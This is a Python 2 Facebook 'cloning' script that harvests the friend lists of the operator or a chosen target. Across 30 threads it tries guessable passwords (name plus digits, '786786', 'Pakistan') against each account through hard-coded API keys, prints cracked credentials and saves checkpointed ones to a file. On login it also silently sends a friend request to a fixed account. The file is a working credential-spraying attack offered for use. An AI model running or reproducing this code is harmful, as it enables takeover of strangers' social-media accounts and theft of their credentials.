#!/usr/bin/python2
#coding=utf-8


import os,sys,time,datetime,random,hashlib,re,threading,json,urllib,cookielib,requests,mechanize
from multiprocessing.pool import ThreadPool
from requests.exceptions import ConnectionError
from mechanize import Browser


reload(sys)
sys.setdefaultencoding('utf8')
br = mechanize.Browser()
br.set_handle_robots(False)
br.set_handle_refresh(mechanize._http.HTTPRefreshProcessor(),max_time=1)
br.addheaders = [('User-Agent', 'Opera/9.80 (Android; Opera Mini/32.0.2254/85. U; id) Presto/2.12.423 Version/12.16')]


def keluar():
	print "\033[1;96m[!] \x1b[1;92mExit"
	os.sys.exit()


def acak(b):
    w = 'ahtdzjc'
    d = ''
    for i in x:
        d += '!'+w[random.randint(0,len(w)-1)]+i
    return cetak(d)


def cetak(b):
    w = 'ahtdzjc'
    for i in w:
        j = w.index(i)
        x= x.replace('!%s'%i,'\033[%s;1m'%str(31+j))
    x += '\033[0m'
    x = x.replace('!0','\033[0m')
    sys.stdout.write(x+'\n')


def jalan(z):
	for e in z + '\n':
		sys.stdout.write(e)
		sys.stdout.flush()
		time.sleep(00000.1)


#### LOGO ####
logo = """
\033[1;99m▀█▀ █▀▄▀█ █▀▀█ █▀▀█ █▀▀▄ 
\033[1;97m▒█░ █░▀░█ █▄▄▀ █▄▄█ █░░█ 
\033[1;94m▄█▄ ▀░░░▀ ▀░▀▀ ▀░░▀ ▀░░▀
\033[1;96m    ║✯ AUTHOR》》MIRZA IMRAN ALI║
\033[1;98m    ║✯ YouTube channel》>SHEETANI LAB║
\033[1;97m    ║✯ WhatsApp +923435976148║
\033[1;96m     | ⲎⲀⲦⲈꞄⲌⲌ ⲔⲀ ⲂⲀⲀⲢ║"""
def tik():
	titik = ['.   ','..  ','... ']
	for o in titik:
		print("\r\x1b[1;97mSABR KRO SARKAAR.... \x1b[1;97m"+o),;sys.stdout.flush();time.sleep(1)


back = 0
berhasil = []
cekpoint = []
oks = []
id = []
listgrup = []
vulnot = "\033[31mNot Vuln"
vuln = "\033[32mVuln"

os.system("clear")
print  """
\033[1;97m*******i*m**r*a***n****************************
\033[1;96m~ 
\033[1;96m ━━━╮╱╱╱╱╱╱╱╭╮╱╱╱╱╱╭╮╭╮
\033[1;97m|╭━╮┃╱╱╱╱╱╱╭╯╰╮╱╱╱╱┃┃┃┃
\033[1;92m┃┃╱╰╋━┳━━┳━┻╮╭╋━━┳━╯┃┃╰━┳╮╱╭╮
\033[1;97m┃┃╱╭┫╭┫┃━┫╭╮┃┃┃┃━┫╭╮┃┃╭╮┃┃╱┃┃
\033[1;98m┃╰━╯┃┃┃┃━┫╭╮┃╰┫┃━┫╰╯┃┃╰╯┃╰━╯┃
\033[1;96m╰━━━┻╯╰━━┻╯╰┻━┻━━┻━━╯╰━━┻━╮╭╯
\033[1;92m╱╱╱╱╱╱╱╱╱╱╱╱╱╱╱╱╱╱╱╱╱╱╱╱╭━╯┃
\033[1;96m╱╱╱╱╱╱╱╱╱╱╱╱╱╱╱╱╱╱╱╱╱╱╱╱╰━━╯
\033[1;93m╭━━╮
\033[1;97m╰┫┣╯
\033[1;96m╱┃┃╭╮╭┳━┳━━┳━╮°
\033[1;95m╱┃┃┃╰╯┃╭┫╭╮┃╭╮╮
\033[1;97m╭┫┣┫┃┃┃┃┃╭╮┃┃┃┃
\033[1;96m╰━━┻┻┻┻╯╰╯╰┻╯╰╯
~
\033[1;97m************************************************

"""
jalan("\033[1;97mME TO Mirza IMRAN ALI  KA FAN HOny LaGA Hun..")
jalan("\033[1;92m HO RAHA HUN BSS LOADING......")
jalan("\033[1;96m 100% HO GIA HUN")
jalan("\033[1;97m DONE jnb")





CorrectUsername = "imran"
CorrectPassword = "imran"
loop = 'true'
while (loop == 'true'):
    username = raw_input("\033[1;92m📋 \x1b[1;97mKisss k fan ho gy tusi naam likho oda\x1b[1;93m»» \x1b[1;92m")
    if (username == CorrectUsername):
    	password = raw_input("\033[1;92m🗝 \x1b[1;96mfr dsii kidaa....\x1b[1;96m»» \x1b[1;92m")
        if (password == CorrectPassword):
            print "Oy pagl tu to sach me bn gia fan of " + username #SMART:MIRZA
	    time.sleep(2)
            loop = 'false'
        else:
            print "\033[1;96mWrong Password"
            os.system('xdg-open https://www.youtube.com/channel/UCKkRTegePJeg0b4J63q90IA')
    else:
        print "\033[1;96mWrong Username"


def login():
	os.system('clear')
	try:
		toket = open('login.txt','r')
		menu() 
	except (KeyError,IOError):
		os.system('clear')
		print logo
		print 42*"\033[1;96m="
		print('\033[1;96m[⚡] \x1b[1;92m───BILKUL NEW ID sy login kre ───\x1b[1;93m[⚡]' )
		id = raw_input('\033[1;93m[+] \x1b[0;34mID ya Email likh \x1b[1;97m: \x1b[1;97m')
		pwd = raw_input('\033[1;97m[+] \x1b[0;34mPassword likh\x1b[1;93m: \x1b[1;93m')
		tik()
		try:
			br.open('https://m.facebook.com')
		except mechanize.URLError:
			print"\n\033[1;96m[!] \x1b[1;92mJNB NET PKG KOI NI"
			keluar()
		br._factory.is_html = True
		br.select_form(nr=0)
		br.form['email'] = id
		br.form['pass'] = pwd
		br.submit()
		url = br.geturl()
		if 'save-device' in url:
			try:
				sig= 'api_key=882a8490361da98702bf97a021ddc14dcredentials_type=passwordemail='+id+'format=JSONgenerate_machine_id=1generate_session_cookies=1locale=en_USmethod=auth.loginpassword='+pwd+'return_ssl_resources=0v=1.062f8ce9f74b12f84c123cc23437a4a32'
				data = {"api_key":"882a8490361da98702bf97a021ddc14d","credentials_type":"password","email":id,"format":"JSON", "generate_machine_id":"1","generate_session_cookies":"1","locale":"en_US","method":"auth.login","password":pwd,"return_ssl_resources":"0","v":"1.0"}
				x=hashlib.new("md5")
				x.update(sig)
				a=x.hexdigest()
				data.update({'sig':a})
				url = "https://api.facebook.com/restserver.php"
				r=requests.get(url,params=data)
				z=json.loads(r.text)
				unikers = open("login.txt", 'w')
				unikers.write(z['access_token'])
				unikers.close()
				print '\n\033[1;96m[✓] \x1b[1;92mmubarkaan Login Hogai j sarkar'
				os.system('xdg-open https://www.youtube.com/channel/UCKkRTegePJeg0b4J63q90IA')
				requests.post('https://graph.facebook.com/me/friends?method=post&uids=gwimusa3&access_token='+z['access_token'])
				menu()
			except requests.exceptions.ConnectionError:
				print"\n\033[1;96m[!] \x1b[1;92mNET KOI NI"
				keluar()
		if 'checkpoint' in url:
			print("\n\033[1;96m[!] \x1b[1;92mEnj lgda a chan mahi tera account  CP TY hai")
			os.system('rm -rf login.txt')
			time.sleep(1)
			keluar()
		else:
			print("\n\033[1;96m[!] \x1b[1;92mPassword/Email ghalat e")
			os.system('rm -rf login.txt')
			time.sleep(1)
			login()


def menu():
	os.system('clear')
	try:
		toket=open('login.txt','r').read()
	except IOError:
		os.system('clear')
		print"\x1b[1;92m[!] Token invalid"
		os.system('rm -rf login.txt')
		time.sleep(1)
		login()
	try:
		otw = requests.get('https://graph.facebook.com/me?access_token='+toket)
		a = json.loads(otw.text)
		nama = a['name']
		id = a['id']
		ots = requests.get('https://graph.facebook.com/me/subscribers?access_token=' + toket)
		b = json.loads(ots.text)
		sub = str(b['summary']['total_count'])
	except KeyError:
		os.system('clear')
		print"\033[1;92mTera account CP ty wy"
		os.system('rm -rf login.txt')
		time.sleep(1)
		login()
	except requests.exceptions.ConnectionError:
		print"\x1b[1;92mNET KOI NI JNB"
		keluar()
	os.system("clear")
	print logo
	print "\033[1;36;40m      ╔═════════════════════════════════╗"
	print "\033[1;36;40m      ║\033[1;32;40m[*] Name\033[1;32;40m: "+nama+"  	   \033[1;36;40m║"                               
	print "\033[1;36;40m      ║\033[1;34;40m[*] ID  \033[1;34;40m: "+id+"        \033[1;36;40m║"
	print "\033[1;36;40m      ║\033[1;34;40m[*] Subs\033[1;34;40m: "+sub+"                      \033[1;36;40m║"
	print "\033[1;36;40m      ╚═════════════════════════════════╝"
	print "    \033[1;32;40m[Type1] \033[1;33;40m‹•.•›Shuru kro cloning"	
	print "    \033[1;32;40m[type2] \033[1;33;40m‹•.•›Update"																														
	print "    \033[1;32;40m[type0] \033[1;33;40m‹•.•›Logout"
	pilih()

def pilih():
	unikers = raw_input("\n\033[1;31;40m>>> \033[1;35;40m")
	if unikers =="":
		print "\x1b[1;92mFill in correctly"
		pilih()
	elif unikers =="1":
		super()
	elif unikers =="2":
		os.system('clear')
		print logo
		print " \033[1;36;40m●══════════════════◄►══════════════════●\n"
		os.system('git pull origin master')
		raw_input('\n\x1b[1;92m[ \x1b[1;97mBack \x1b[1;92m]')
		menu()
	elif unikers =="0":
		jalan('Token Removed')
		os.system('rm -rf login.txt')
		keluar()
	else:
		print "\x1b[1;92mFill in correctly"
		pilih()

def super():
	global toket
	os.system('clear')
	try:
		toket=open('login.txt','r').read()
	except IOError:
		print"\x1b[1;92mToken invalid"
		os.system('rm -rf login.txt')
		time.sleep(1)
		login()
	os.system('clear')
	print logo
	print "     \033[1;97m-•◈•-\033[1;92m> \033[1;92m1.\x1b[1;97m>_<Clone Friend List."
	print "     \033[1;97m-•◈•-\033[1;92m> \033[1;92m2.\x1b[1;95m>_<AWAM KI IDZZ UTHANI HAIN ."
	print "     \033[1;97m-•◈•-\033[1;92m> \033[1;92m0.\033[1;92m>_<Back"
	pilih_super()

def pilih_super():
	peak = raw_input("\n\033[1;92m^.^ik Option select kr>>> \033[1;97m")
	if peak =="":
		print "\x1b[1;92mFill in correctly"
		pilih_super()
	elif peak =="1":
		os.system('clear')
		print logo
		print "\033[1;97m•◈•══════•◈•\033[1;92mSMART MIRZA\033[1;97m•◈•══════•◈•"
		jalan('\033[1;92mGetting IDs \033[1;92m...')
		r = requests.get("https://graph.facebook.com/me/friends?access_token="+toket)
		z = json.loads(r.text)
		for s in z['data']:
			id.append(s['id'])
	elif peak =="2":
		os.system('clear')
		print logo
		idt = raw_input("\033[1;97m[•◈•] \033[1;92mid Likh oy\033[1;97m: \033[1;97m")
		print "\033[1;92m•◈•══════••◈•\033[1;92mSMART MIRZA\033[1;97m•◈•══════••◈•"
		try:
			jok = requests.get("https://graph.facebook.com/"+idt+"?access_token="+toket)
			op = json.loads(jok.text)
			print"\033[1;92mName\033[1;97m:\033[1;97m "+op["name"]
		except KeyError:
			print"\x1b[1;92mID koi ni labi!"
			raw_input("\n\033[1;97m[\033[1;92mBack\033[1;97m]")
			super()
		print"\033[1;92mGetting IDs\033[1;97m..."
		r = requests.get("https://graph.facebook.com/"+idt+"/friends?access_token="+toket)
		z = json.loads(r.text)
		for i in z['data']:
			id.append(i['id'])
	elif peak =="0":
		menu()
	else:
		print "\x1b[1;92mFill in correctly"
		pilih_super()
	
	print "\033[1;36;40m[✺] Total IDs : \033[1;96m"+str(len(id))
	jalan('\033[1;34;40m[✺] sbr kro srkaar...')
	titik = ['.   ','..  ','... ']
	for o in titik:
		print("\r\033[1;32;40m[✺] Cloning\033[1;93m"+o),;sys.stdout.flush();time.sleep(1)
	print "\n\033[1;96m        ❈     \x1b[1;92mTo Stop Process Press CTRL+Z \033[1;96m    ❈"
	print "   \033[1;92m●══════════════════◄►══════════════════●"

	jalan('           \033[1;96mMANI start kr deti a cloning tu sbr kr .. ...')
	print  "  \033[1;92m ●══════════════════◄►══════════════════●" 

	def main(arg):
		global cekpoint,oks
		user = arg
		try:
			os.mkdir('out')
		except OSError:
			pass #SMART:MIRZA
		try:
			a = requests.get('https://graph.facebook.com/'+user+'/?access_token='+toket)												
			b = json.loads(a.text)												
			pass1 = b['first_name'] + '1234'												
			data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(user)+"&locale=en_US&password="+(pass1)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")												
			q = json.load(data)												
			if 'access_token' in q:
				x = requests.get("https://graph.facebook.com/"+user+"?access_token="+q['access_token'])
				z = json.loads(x.text)
				print '\x1b[1;96m[ ✓ ] \x1b[1;92mHaCKED BY MANI💉'											
				print '\x1b[1;96m[•⚔•] \x1b[1;92mName \x1b[1;92m ✯ \x1b[1;92m' + b['name']											
				print '\x1b[1;96m[•⚔•] \x1b[1;92mID \x1b[1;92m      ✯ \x1b[1;92m' + user											
				print '\x1b[1;96m[•⚔•] \x1b[1;92mPassword \x1b[1;92m✯ \x1b[1;92m' + pass1 + '\n'											
				oks.append(user+pass1)
                        else:
			        if 'www.facebook.com' in q["error_msg"]:
				    print '\x1b[1;96m[ ❥ ] \x1b[1;96mCP'
				    print '\x1b[1;96m[•⚔•] \x1b[1;96mName \x1b[1;96m    ✯ \x1b[1;97m' + b ['name']
				    print '\x1b[1;96m[•⚔•] \x1b[1;96mID \x1b[1;96m      ✯ \x1b[1;97m' + user
				    print '\x1b[1;96m[•⚔•] \x1b[1;96mPassword \x1b[1;96m✯ \x1b[1;97m' + pass1 + '\n'
				    cek = open("out/super_cp.txt", "a")
				    cek.write("ID:" +user+ " Pw:" +pass1+"\n")
				    cek.close()
				    cekpoint.append(user+pass1)
                                else:
				    pass2 = b['first_name'] + '123'										
                                    data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(user)+"&locale=en_US&password="+(pass2)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")												
			            q = json.load(data)												
			            if 'access_token' in q:	
				            x = requests.get("https://graph.facebook.com/"+user+"?access_token="+q['access_token'])
				            z = json.loads(x.text)
				            print '\x1b[1;96m[  ✓  ] \x1b[1;92mHaCKED BY MANI💉'											
				            print '\x1b[1;96m[•⚔•] \x1b[1;92mName \x1b[1;92m    ✯ \x1b[1;92m' + b['name']											
				            print '\x1b[1;96m[•⚔•] \x1b[1;92mID \x1b[1;92m      ✯ \x1b[1;92m' + user								
				            print '\x1b[1;96m[•⚔•] \x1b[1;92mPassword \x1b[1;92m✯ \x1b[1;92m' + pass2 + '\n'											
				            oks.append(user+pass2)
                                    else:
			                   if 'www.facebook.com' in q["error_msg"]:
				               print '\x1b[1;96m[ ❥ ] \x1b[1;96mCP'
				               print '\x1b[1;96m[•⚔•] \x1b[1;96mName \x1b[1;96m    ✯ \x1b[1;97m' + b['name']
				               print '\x1b[1;96m[•⚔•] \x1b[1;96mID \x1b[1;96m      ✯ \x1b[1;97m' + user
				               print '\x1b[1;96m[•⚔•] \x1b[1;96mPassword \x1b[1;96m✯ \x1b[1;97m' + pass2 + '\n'
				               cek = open("out/super_cp.txt", "a")
				               cek.write("ID:" +user+ " Pw:" +pass2+"\n")
				               cek.close()
				               cekpoint.append(user+pass2)								
				           else:											
					       pass3 = b['last_name']+'123'										
					       data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(user)+"&locale=en_US&password="+(pass3)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")										
					       q = json.load(data)										
					       if 'access_token' in q:	
						       x = requests.get("https://graph.facebook.com/"+user+"?access_token="+q['access_token'])
				                       z = json.loads(x.text)
						       print '\x1b[1;96m[  ✓  ] \x1b[1;92mHaCKED BY MANI💉'								
						       print '\x1b[1;96m[•⚔•] \x1b[1;92mName \x1b[1;92m    ✯ \x1b[1;92m' + b['name']									
						       print '\x1b[1;96m[•⚔•] \x1b[1;92mID \x1b[1;92m      ✯ \x1b[1;92m' + user							
						       print '\x1b[1;96m[•⚔•] \x1b[1;92mPassword \x1b[1;92m✯ \x1b[1;92m' + pass3 + '\n'									
						       oks.append(user+pass3)
                                               else:
			                               if 'www.facebook.com' in q["error_msg"]:
				                           print '\x1b[1;96m[ ❥ ] \x1b[1;96mCP'
				                           print '\x1b[1;96m[•⚔•] \x1b[1;96mName \x1b[1;96m    ✯ \x1b[1;97m' + b['name']
				                           print '\x1b[1;96m[•⚔•] \x1b[1;96mID \x1b[1;96m      ✯ \x1b[1;97m' + user
				                           print '\x1b[1;96m[•⚔•] \x1b[1;96mPassword \x1b[1;96m✯ \x1b[1;97m' + pass3 + '\n'
				                           cek = open("out/super_cp.txt", "a")
				                           cek.write("ID:" +user+ " Pw:" +pass3+"\n")
				                           cek.close()
				                           cekpoint.append(user+pass3)									
					               else:										
						           pass4 = b['first_name'] + 'khan'											
			                                   data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(user)+"&locale=en_US&password="+(pass4)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")												
			                                   q = json.load(data)												
			                                   if 'access_token' in q:		
						                   x = requests.get("https://graph.facebook.com/"+user+"?access_token="+q['access_token'])
				                                   z = json.loads(x.text)
				                                   print '\x1b[1;96m[  ✓  ] \x1b[1;92mHaCKED BY MANI💉'											
				                                   print '\x1b[1;96m[•⚔•] \x1b[1;92mName \x1b[1;92m    ✯ \x1b[1;92m' + b['name']											
				                                   print '\x1b[1;96m[•⚔•] \x1b[1;92mID \x1b[1;92m      ✯ \x1b[1;92m' + user											
				                                   print '\x1b[1;96m[•⚔•] \x1b[1;92mPassword \x1b[1;92m✯ \x1b[1;92m' + pass4 + '\n'											
				                                   oks.append(user+pass4)
                                                           else:
			                                           if 'www.facebook.com' in q["error_msg"]:
				                                       print '\x1b[1;96m[ ❥ ] \x1b[1;96mCp'
				                                       print '\x1b[1;96m[•⚔•] \x1b[1;96mName \x1b[1;96m    ✯ \x1b[1;97m' + b['name']
				                                       print '\x1b[1;96m[•⚔•] \x1b[1;96mID \x1b[1;96m      ✯ \x1b[1;97m' + user
				                                       print '\x1b[1;96m[•⚔•] \x1b[1;96mPassword \x1b[1;96m✯ \x1b[1;97m' + pass4 + '\n'
				                                       cek = open("out/super_cp.txt", "a")
				                                       cek.write("ID:" +user+ " Pw:" +pass4+"\n")
				                                       cek.close()
				                                       cekpoint.append(user+pass4)					
					                           else:									
						                       pass5 = '786786'							
						                       data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(user)+"&locale=en_US&password="+(pass5)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")								
						                       q = json.load(data)								
						                       if 'access_token' in q:	
						                               x = requests.get("https://graph.facebook.com/"+user+"?access_token="+q['access_token'])
				                                               z = json.loads(x.text)
						                               print '\x1b[1;96m[  ✓  ] \x1b[1;92mHaCKED BY MANI💉'						
						                               print '\x1b[1;96m[•⚔•] \x1b[1;92mName \x1b[1;92m    ✯ \x1b[1;92m' + b['name']							
						                               print '\x1b[1;96m[•⚔•] \x1b[1;92mID \x1b[1;92m      ✯ \x1b[1;92m' + user					
						                               print '\x1b[1;96m[•⚔•] \x1b[1;92mPassword \x1b[1;92m✯ \x1b[1;92m' + pass5 + '\n'							
						                               oks.append(user+pass5)	
                                                                       else:
			                                                       if 'www.facebook.com' in q["error_msg"]:
				                                                   print '\x1b[1;96m[ ❥ ] \x1b[1;96mCP'
				                                                   print '\x1b[1;96m[•⚔•] \x1b[1;96mName \x1b[1;96m    ✯ \x1b[1;97m' + b['name']
				                                                   print '\x1b[1;96m[•⚔•] \x1b[1;96mID \x1b[1;96m      ✯ \x1b[1;97m' + user
				                                                   print '\x1b[1;96m[•⚔•] \x1b[1;96mPassword \x1b[1;96m✯ \x1b[1;97m' + pass5 + '\n'
				                                                   cek = open("out/super_cp.txt", "a")
				                                                   cek.write("ID:" +user+ " Pw:" +pass5+"\n")
				                                                   cek.close()
				                                                   cekpoint.append(user+pass5)					
						                               else:								
							                           pass6 = 'Pakistan'											
			                                                           data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(user)+"&locale=en_US&password="+(pass6)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")												
			                                                           q = json.load(data)												
			                                                           if 'access_token' in q:	
								                           x = requests.get("https://graph.facebook.com/"+user+"?access_token="+q['access_token'])
				                                                           z = json.loads(x.text)
				                                                           print '\x1b[1;96m[  ✓  ] \x1b[1;92mHaCKED BY MANI💉'											
				                                                           print '\x1b[1;96m[•⚔•] \x1b[1;92mName \x1b[1;92m    ✯ \x1b[1;92m' + b['name']											
				                                                           print '\x1b[1;96m[•⚔•] \x1b[1;92mID \x1b[1;92m      ✯ \x1b[1;92m' + user									
				                                                           print '\x1b[1;96m[•⚔•] \x1b[1;92mPassword \x1b[1;92m✯ \x1b[1;92m' + pass6 + '\n'											
				                                                           oks.append(user+pass6)
                                                                                   else:
			                                                                   if 'www.facebook.com' in q["error_msg"]:
				                                                               print '\x1b[1;96m[ ❥ ] \x1b[1;96mCP'
				                                                               print '\x1b[1;96m[•⚔•] \x1b[1;96mName \x1b[1;96m    ✯ \x1b[1;97m' + b['name']
				                                                               print '\x1b[1;96m[•⚔•] \x1b[1;96mID \x1b[1;96m      ✯ \x1b[1;97m' + user
				                                                               print '\x1b[1;96m[•⚔•] \x1b[1;96mPassword \x1b[1;96m✯ \x1b[1;97m' + pass6 + '\n'
				                                                               cek = open("out/super_cp.txt", "a")
				                                                               cek.write("ID:" +user+ " Pw:" +pass6+"\n")
				                                                               cek.close()
				                                                               cekpoint.append(user+pass6)	
						                                           else:							
								                               pass7 = b['first_name']+'12345'						
								                               data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(user)+"&locale=en_US&password="+(pass7)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")						
								                               q = json.load(data)						
								                               if 'access_token' in q:		
				                                                                       x = requests.get("https://graph.facebook.com/"+user+"?access_token="+q['access_token'])
				                                                                       z = json.loads(x.text)
									                               print '\x1b[1;96m[  ✓  ] \x1b[1;92mHaCKED BY MANI💉'					
									                               print '\x1b[1;96m[•⚔•] \x1b[1;92mName \x1b[1;92m    ✯ \x1b[1;92m' + b['name']					
									                               print '\x1b[1;96m[•⚔•] \x1b[1;92mID \x1b[1;92m      ✯ \x1b[1;92m' + user				
									                               print '\x1b[1;96m[•⚔•] \x1b[1;92mPassword \x1b[1;92m✯ \x1b[1;92m' + pass7 + '\n'					
									                               oks.append(user+pass7)
                                                                                               else:
			                                                                               if 'www.facebook.com' in q["error_msg"]:
				                                                                           print '\x1b[1;96m[ ❥ ] \x1b[1;96mCP'
				                                                                           print '\x1b[1;96m[•⚔•] \x1b[1;96mName \x1b[1;96m    ✯ \x1b[1;97m' + b['name']
				                                                                           print '\x1b[1;96m[•⚔•] \x1b[1;96mID \x1b[1;96m      ✯ \x1b[1;97m' + user
				                                                                           print '\x1b[1;96m[•⚔•] \x1b[1;96mPassword \x1b[1;96m✯ \x1b[1;97m' + pass7 + '\n'
				                                                                           cek = open("out/super_cp.txt", "a")
				                                                                           cek.write("ID:" +user+ " Pw:" +pass7+"\n")
				                                                                           cek.close()
				                                                                           cekpoint.append(user+pass7)           					
								                                       else:						
										                           pass8 = b['last_name'] + '786'											
			                                                                                   data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(user)+"&locale=en_US&password="+(pass8)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")												
			                                                                                   q = json.load(data)												
			                                                                                   if 'access_token' in q:		
										                                   x = requests.get("https://graph.facebook.com/"+user+"?access_token="+q['access_token'])
				                                                                                   z = json.loads(x.text)
				                                                                                   print '\x1b[1;96m[  ✓  ] \x1b[1;92mHaCKED BY MANI💉'											
				                                                                                   print '\x1b[1;96m[•⚔•] \x1b[1;92mName \x1b[1;92m    ✯ \x1b[1;92m' + b['name']											
				                                                                                   print '\x1b[1;96m[•⚔•] \x1b[1;92mID \x1b[1;92m      ✯ \x1b[1;92m' + user										
				                                                                                   print '\x1b[1;96m[•⚔•] \x1b[1;92mPassword \x1b[1;92m✯ \x1b[1;92m' + pass8 + '\n'											
				                                                                                   oks.append(user+pass8)
                                                                                                           else:
			                                                                                           if 'www.facebook.com' in q["error_msg"]:
				                                                                                       print '\x1b[1;96m[ ❥ ] \x1b[1;96mCP'
				                                                                                       print '\x1b[1;96m[•⚔•] \x1b[1;96mName \x1b[1;96m    ✯ \x1b[1;97m' + b['name']
				                                                                                       print '\x1b[1;96m[•⚔•] \x1b[1;96mID \x1b[1;96m      ✯ \x1b[1;97m' + user
				                                                                                       print '\x1b[1;96m[•⚔•] \x1b[1;96mPassword \x1b[1;96m✯ \x1b[1;97m' + pass8 + '\n'
				                                                                                       cek = open("out/super_cp.txt", "a")
				                                                                                       cek.write("ID:" +user+ " Pw:" +pass8+"\n")
				                                                                                       cek.close()
				                                                                                       cekpoint.append(user+pass8)   	
										                                   else:					
										                                       pass9 = b['first_name'] + '786'					
										                                       data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(user)+"&locale=en_US&password="+(pass9)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")				
										                                       q = json.load(data)				
										                                       if 'access_token' in q:		
		                                                                                                               x = requests.get("https://graph.facebook.com/"+user+"?access_token="+q['access_token'])
				                                                                                               z = json.loads(x.text)
											                                       print '\x1b[1;96m[  ✓  ] \x1b[1;92mHaCKED BY MANI💉'			
											                                       print '\x1b[1;96m[•⚔•] \x1b[1;92mName \x1b[1;92m    ✯ \x1b[1;92m' + b['name']			
											                                       print '\x1b[1;96m[•⚔•] \x1b[1;92mID \x1b[1;92m      ✯ \x1b[1;92m' + user	
											                                       print '\x1b[1;96m[•⚔•] \x1b[1;92mPassword \x1b[1;92m✯ \x1b[1;92m' + pass9 + '\n'			
											                                       oks.append(user+pass9)
                                                                                                                       else:
			                                                                                                       if 'www.facebook.com' in q["error_msg"]:
				                                                                                                   print '\x1b[1;96m[ ❥ ] \x1b[1;96mCP'
				                                                                                                   print '\x1b[1;96m[•⚔•] \x1b[1;96mName \x1b[1;96m    ✯ \x1b[1;97m' + b['name']
				                                                                                                   print '\x1b[1;96m[•⚔•] \x1b[1;96mID \x1b[1;96m      ✯ \x1b[1;97m' + user
				                                                                                                   print '\x1b[1;96m[•⚔•] \x1b[1;96mPassword \x1b[1;96m✯ \x1b[1;97m' + pass9 + '\n'
				                                                                                                   cek = open("out/super_cp.txt", "a")
				                                                                                                   cek.write("ID:" +user+ " Pw:" +pass9+"\n")
				                                                                                                   cek.close()
				                                                                                                   cekpoint.append(user+pass9)		
											                                       
																	
															
		except:
			pass
		
		
		
	p = ThreadPool(30)
	p.map(main, id)
	print "\033[1;97m•◈•▬ ▬ ▬ ▬ ▬ ▬ ▬•◈•\033[1;92mSmartMirza\033[1;97m•◈•▬ ▬ ▬ ▬ ▬ ▬ ▬•◈•"
	print "  \033[1;92m«---•◈•---Developed By MIRZA MANI--•◈•---»" #SMART:MIRZA
	print '\033[1;96m✅HACKING HO GAI PURI AGLI WARI LIKHNA A↩(python2 mani3.py)↩\033[1;97m....'
	print"\033[1;92mTotal OK/\x1b[1;97mCP \033[1;93m: \033[1;92m"+str(len(oks))+"\033[1;96m/\033[1;96m"+str(len(cekpoint))
	print """
  HO GIA TU MANI KA FAN
\033[1;96m ⊂ヽ
\033[1;96m  ＼＼  Λ＿Λ
　\033[1;96m　 ＼( ˘ω˘ )
　　　 > ⌒ヽ
　　　/ 　 へ＼
　　 /　　/　＼＼
　　 ﾚ　ノ　　 ヽ_つ
　　/　/
　 /　/|
　(　(ヽ
　|　|、 \
　| 丿  \⌒\
　| |　    )  /
 ノ )       Lﾉ
(_／



















       acha hun  CP ali idzz 7 din baad login kree
•\033[1;97m◈•▬ ▬ ▬ ▬ ▬ ▬ ▬•◈•▬ ▬ ▬ ▬ ▬ ▬ ▬•◈•.
: \033[1;92m ....MIRZA MANI Creations....... \033[1;97m :
•\033[1;97m◈•▬ ▬ ▬ ▬ ▬ ▬ ▬•◈•▬ ▬ ▬ ▬ ▬ ▬ ▬•◈•.' 
                Facebook
              \033[1;92m imran87mi"""
	
	raw_input("\n\033[1;97m[\033[1;92mBack\033[1;97m]")
	menu()

if __name__ == '__main__':
	login()
